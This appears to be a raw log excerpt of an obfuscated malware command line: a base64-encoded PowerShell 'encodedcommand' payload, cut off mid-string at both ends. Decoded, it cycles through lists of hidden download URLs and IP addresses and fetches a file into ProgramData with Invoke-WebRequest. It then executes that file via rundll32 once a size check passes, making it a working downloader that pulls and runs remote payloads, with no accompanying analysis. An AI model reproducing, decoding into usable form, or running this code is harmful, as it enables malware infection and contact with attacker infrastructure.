AEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANQBBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE0AUQBBADIAQQBBAD0APQB6AFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABRAEEAYQBBAEIAMQBBAEcAMABBAFkAZwBCAGwAQQBIAEkAQQBVAEEAQgA1AEEASABJAEEAYgB3AEIANABBAEgAawBBAGIAQQBCAGwAQQBDADQAQQBZAHcAQgB1AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAawBBAFkAUQBCADYAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGMAQQBCAG8AQQBHAGsAQQBZAHcAQgB6AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBADAAQQBDADQAQQBNAFEAQQAwAEEARABBAEEATABnAEEAeABBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQQA9AD0AIgA7ACQAdgBpAGEAYgBpAGwAaQB0AGkAZQBzAEQAZQBuAHMAaABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAVQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATQBBAEEAPQBJAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAYgBBAEIAcABBAEcANABBAGEAdwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEARwBZAEEAZQBRAEIAcABBAEEAPQA9AEkAYgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBHADQAQQBhAEEAQgBsAEEASABJAEEAYQBRAEIAMABBAEcARQBBAGIAZwBCAGoAQQBHAFUAQQBMAGcAQgBqAEEARwA0AEEASQBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE0AUQBBAHUAQQBEAEUAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAFEAQQA9ACIAOwAkAFQAbwByAG4AYQBkAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAEEAQQBOAFEAQQB1AEEARABFAEEATgBBAEEAeABBAEEAPQA9AGYAZgBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGIAdwBCAHoAQQBIAFEAQQBaAFEAQgB5AEEARwBrAEEAYgB3AEIAeQBBAEcAawBBAFQAUQBCADUAQQBIAFEAQQBhAEEAQgB2AEEASABBAEEAYgB3AEIAbABBAEgAUQBBAGEAUQBCADYAQQBHAFUAQQBMAGcAQgBqAEEARwB3AEEAZABRAEIAaQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAQQB1AGMAdABvAHIAaQBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBOAEEAQQB1AEEARABFAEEATwBBAEEANABBAEEAPQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB6AEEASABRAEEAYQBRAEIAagBBAEgAVQBBAGIAQQBCAGgAQQBHAE0AQQBhAFEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHkAQQBIAFEAQQBaAHcAQgBoAEEARwBjAEEAWgBRAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwB3AEEAYQBRAEIAMABBAEgAYwBBAGIAdwBCAHkAQQBHAHMAQQBMAGcAQgB0AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAIgA7ACQAZQBlAHIAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAMwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATgBRAEEAPQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFkAQQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARwBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQBkAHcAQgB2AEEASABJAEEAZABBAEIAbwBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBGAEEASABVAEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAEUAQQBkAEEAQgBwAEEARwA0AEEATABnAEIANgBBAEcAOABBAGIAZwBCAGwAQQBBAD0APQAiADsAJABuAGUAbwB0AGUAcgBpAGMAYQBsAGwAeQBQAHIAbwBiAGwAZQBtAGEAdABpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASwBBAEcARQBBAFkAdwBCAGgAQQBIAEkAQQBZAFEAQgB1AEEARwBRAEEAWQBRAEEAdQBBAEcASQBBAGEAUQBCAHYAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAVQBBAGMAdwBCAHAAQQBHAE0AQQBZAFEAQgBzAEEARwB3AEEAZQBRAEEAdQBBAEcAawBBAGIAUQBBAD0ATwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBPAEEAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAVQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQA0AEEAQQA9AD0AIgA7AH0AfQAkAG8AdAB0AG8AbQBhAG4AbABpAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHoAQQBHAGsAQQBjAFEAQgAxAEEARwBVAEEATABnAEIAMgBBAEcAVQBBAFoAdwBCAGgAQQBIAE0AQQAiADsAJABTAHAAbABpAGMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEASABVAEEAYgBRAEIAcABBAEcANABBAFkAUQBCAHMAQQBDADQAQQBjAHcAQgBoAEEARwB3AEEAWgBRAEEAPQBvAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEARwBVAEEAYgBnAEIAaABBAEcANABBAFkAdwBCAGwAQQBIAEkAQQBVAHcAQgBsAEEASABBAEEAZABRAEIAcwBBAEgAUQBBAEwAZwBCAG4AQQBHADAAQQBZAGcAQgBvAEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAFkAUQBCAHoAQQBIAEEAQQBhAFEAQgB6AEEARwBnAEEAYgBBAEIANQBBAEUATQBBAGEAQQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEARwBrAEEAWQBRAEIAdQBBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBkAEEAQgBwAEEARwB3AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCAGgAQQBIAEkAQQBiAFEAQgA1AEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGQAUQBCAHMAQQBHADAAQQBiAHcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFUAQQBiAGcAQgB6AEEASABrAEEAYgBRAEIAaQBBAEcAOABBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAbwBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBiAFEAQgBoAEEASABNAEEAIgA7ACQAVwBvAHIAcgBpAGMAbwB3ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgBBAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBZAFEAQgB1AEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0AIgA7AA=="
cmdline powershell -encodedcommand "JABBAGwAbQBzAGcAaQB2AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABZAEEATABnAEEAeQBBAEQAVQBBAE4AQQBBAHUAQQBEAGsAQQBPAEEAQQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAVQBBAGIAZwBCADAAQQBHAFUAQQBiAFEAQgB3AEEASABRAEEAYQBRAEIAaQBBAEcAdwBBAGUAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCADAAQQBHAEUAQQBjAGcAQgA1AEEAQwA0AEEAYgBnAEIAcwBBAEEAPQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbABBAEcAdwBBAGEAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEARwA0AEEAZABBAEEAdQBBAEcAawBBAGQAQQBBAD0AIgA7ACQAcAByAGUAZABpAHMAYwBvAHYAZQByAHkAVQBuAG0AYQByAHIAaQBhAGcAZQBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEANQBBAEQAVQBBACIAOwAkAGkAbgB0AG8AeABpAGMAYQB0AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBjAGcAQgBoAEEARwA0AEEAYgBnAEIAcABBAEcAVQBBAGMAdwBCAFEAQQBHAEUAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAeQBBAEcARQBBAGMAdwBCAHAAQQBIAE0AQQBkAEEAQQB1AEEASABBAEEAYgBBAEIAMQBBAEgATQBBAHYASABBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAFkAQQBNAEEAQQB1AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBBAD0APQB2AEgAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBIAFUAQQBZAGcAQgAwAEEARwBrAEEAZABBAEIAcwBBAEcAawBBAGIAZwBCAG4AQQBFAFUAQQBlAEEAQgAwAEEASABVAEEAYwB3AEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAE0AQQBZAFEAQgB3AEEARwBVAEEAZABBAEIAdgBBAEgAYwBBAGIAZwBBAD0AdgBIAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEARwA0AEEAYQBnAEIAdgBBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgA1AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9ACIAOwAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATwBRAEEAMwBBAEMANABBAE4AQQBBAHoAQQBDADgAQQBjAFEAQgBrAEEARgBBAEEATAB3AEIAMwBBAEUAWQBBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEQAYwBBAFoAZwBCAGkAQQBFAE0AQQBlAFEAQgBoAEEASABRAEEAVABBAEIANQBBAEEAPQA9AEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATwBRAEEAeQBBAEMAOABBAFMAZwBCAFUAQQBHAGsAQQBMAHcAQgAwAEEARgBvAEEAYgBnAEIAcABBAEUAVQBBAFIAZwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBKAEEARQBNAEEAVgB3AEEAdwBBAEcAYwBBAE8AUQBCAFMAQQBFAHMAQQBRAFEAQgBMAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAYwBsAGEAeQBvAHEAdQBvAHQAWABpAHAAaABvAHMAdQByAGUAIABpAG4AIAAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAC0AcwBwAGwAaQB0ACAAIgBKACIAKQAgAHsAJABDAGgAYQByAGkAbAB5AEMAbwByAG4AaQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQBRAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABJAEEATABnAEEAeABBAEQAWQBBAE4AUQBBAD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBAHgAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMABBAEEAPQA9ACIAOwAkAEIAbwBuAHoAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBBAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAyAEEARABRAEEATABnAEEAeABBAEQASQBBAE0AZwBBAD0AdgBmAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABjAEEATABnAEEANABBAEQAQQBBAEwAZwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABrAEEATgBBAEEAPQB2AGYAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBiAGcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcARQBBAGIAZwBCADAAQQBFAGsAQQBaAEEAQgBwAEEARwA4AEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHADgAQQBjAHcAQgB2AEEARwAwAEEAWgBRAEEAdQBBAEcAVQBBAGMAdwBCADAAQQBHAEUAQQBkAEEAQgBsAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFUAbgBzAGkAbgBnAGwAZQBuAGUAcwBzAEIAbwBuAHMAcABpAGUAbABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABFAEEATABnAEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMABBAEEAPQA9AFoAcQBDAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBOAEEARwBVAEEAYwB3AEIAaABBAEcAdwBBAGIAQQBCAHAAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAdwBBAEcAawBBAFkAdwBCAHoAQQBBAD0APQAiADsAJAB1AG4AZABlAHIAdABlAGEAbQBlAGQAQwBpAHQAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEkAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEAYgB3AEIANABBAEcAVQBBAGIAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEARwBZAEEAWQBRAEIAcABBAEcAdwBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABFAEEATgB3AEEAdQBBAEQASQBBAE0AZwBBAHgAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEAMQBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQA1AEEARABJAEEATABnAEEAeABBAEQARQBBAE8AUQBBAD0AIgA7ACQAVQBuAGMAbwBuAHQAZQBtAHAAbABhAHQAaQB2AGUAbgBlAHMAcwBEAGUAYwBhAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABjAGwAYQB5AG8AcQB1AG8AdABYAGkAcABoAG8AcwB1AHIAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBjAG8AbgB0AGUAbQBwAGwAYQB0AGkAdgBlAG4AZQBzAHMARABlAGMAYQBkAGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ADsAJABQAG8AbAB5AHIAaAB5AHQAaABtAGkAYwBhAGwAbAB5AFMAdQBwAGUAcgBjAGEAcAB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEASABJAEEAWQBRAEIAdABBAEcAVQBBAGIAQQBCAHMAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQBPAHQAUwBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAOABBAGIAZwBCAGwAQQBHAEUAQQBZAHcAQgBvAEEARwBVAEEATABnAEIAegBBAEgAUQBBAE8AdABTAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATQB3AEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AdwBBAD0ATwB0AFMAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQAzAEEARABZAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA1ADMAOQA5ADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAHcAQQBZAFEAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAxAEEARwA0AEEAYgBnAEIAaABBAEcAawBBAGQAZwBCAGwAQQBHAHcAQQBlAFEAQQBzAEEASABZAEEAYQBRAEIAdwBBAEgATQBBAE8AdwBCAE4AQQBFAGsAQQBWAEEAQgBNAEEARwBrAEEAWQB3AEIAbABBAEcANABBAGMAdwBCAGwAQQBBAD0APQAiADsAJABFAG4AcwBpAGUAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANQBBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE0AUQBBADIAQQBBAD0APQB6AFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABRAEEAYQBBAEIAMQBBAEcAMABBAFkAZwBCAGwAQQBIAEkAQQBVAEEAQgA1AEEASABJAEEAYgB3AEIANABBAEgAawBBAGIAQQBCAGwAQQBDADQAQQBZAHcAQgB1AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAawBBAFkAUQBCADYAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGMAQQBCAG8AQQBHAGsAQQBZAHcAQgB6AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBADAAQQBDADQAQQBNAFEAQQAwAEEARABBAEEATABnAEEAeABBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQQA9AD0AIgA7ACQAdgBpAGEAYgBpAGwAaQB0AGkAZQBzAEQAZQBuAHMAaABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAVQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATQBBAEEAPQBJAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAYgBBAEIAcABBAEcANABBAGEAdwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEARwBZAEEAZQBRAEIAcABBAEEAPQA9AEkAYgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBHADQAQQBhAEEAQgBsAEEASABJAEEAYQBRAEIAMABBAEcARQBBAGIAZwBCAGoAQQBHAFUAQQBMAGcAQgBqAEEARwA0AEEASQBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE0AUQBBAHUAQQBEAEUAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAFEAQQA9ACIAOwAkAFQAbwByAG4AYQBkAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAEEAQQBOAFEAQQB1AEEARABFAEEATgBBAEEAeABBAEEAPQA9AGYAZgBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGIAdwBCAHoAQQBIAFEAQQBaAFEAQgB5AEEARwBrAEEAYgB3AEIAeQBBAEcAawBBAFQAUQBCADUAQQBIAFEAQQBhAEEAQgB2AEEASABBAEEAYgB3AEIAbABBAEgAUQBBAGEAUQBCADYAQQBHAFUAQQBMAGcAQgBqAEEARwB3AEEAZABRAEIAaQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAQQB1AGMAdABvAHIAaQBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBOAEEAQQB1AEEARABFAEEATwBBAEEANABBAEEAPQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB6AEEASABRAEEAYQBRAEIAagBBAEgAVQBBAGIAQQBCAGgAQQBHAE0AQQBhAFEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHkAQQBIAFEAQQBaAHcAQgBoAEEARwBjAEEAWgBRAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwB3AEEAYQBRAEIAMABBAEgAYwBBAGIAdwBCAHkAQQBHAHMAQQBMAGcAQgB0AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAIgA7ACQAZQBlAHIAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAMwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATgBRAEEAPQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFkAQQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARwBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQBkAHcAQgB2AEEASABJAEEAZABBAEIAbwBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBGAEEASABVAEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAEUAQQBkAEEAQgBwAEEARwA0AEEATABnAEIANgBBAEcAOABBAGIAZwBCAGwAQQBBAD0APQAiADsAJABuAGUAbwB0AGUAcgBpAGMAYQBsAGwAeQBQAHIAbwBiAGwAZQBtAGEAdABpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASwBBAEcAR